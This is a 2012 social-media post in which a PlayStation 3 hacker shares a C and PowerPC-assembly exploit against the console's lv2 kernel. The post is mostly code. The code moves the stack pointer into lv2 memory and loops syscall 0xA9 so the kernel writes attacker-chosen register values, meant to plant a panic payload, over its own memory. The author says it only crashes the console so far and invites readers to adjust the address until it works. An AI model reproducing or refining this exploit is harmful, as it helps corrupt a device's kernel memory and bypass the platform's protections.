KDSBest

KDSBest · @KDSBest

22nd Sep 2012 from Twitlonger

Since @naehrwert posted an lv2 exploit I will do so too ;). The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. ;) Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don't know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf


register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");

int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;

payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;

// Incrementer
counter = 0x00;

// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall

asm("li %r0, 0x0");
asm("li %r3, 0x6");
asm("li %r4, 0x1");
// li r11, 0x24F -> PANIC
asm("mr %r22, %r20");
asm("mr %r23, %r20");
asm("mr %r24, %r20");
asm("mr %r27, %r20");
asm("mr %r28, %r20");
asm("mr %r29, %r20");
asm("mr %r30, %r20");
asm("mr %r31, %r20");

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;

// We write sc
asm("mr %r22, %r21");
asm("mr %r23, %r21");
asm("mr %r24, %r21");
asm("mr %r27, %r21");
asm("mr %r28, %r21");
asm("mr %r29, %r21");
asm("mr %r30, %r21");
asm("mr %r31, %r21");

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;


if(counter < 0x1000000)
goto doItAgain;

stackpointer = bufferStackpointer;
return 0;
}

Reply · Report Post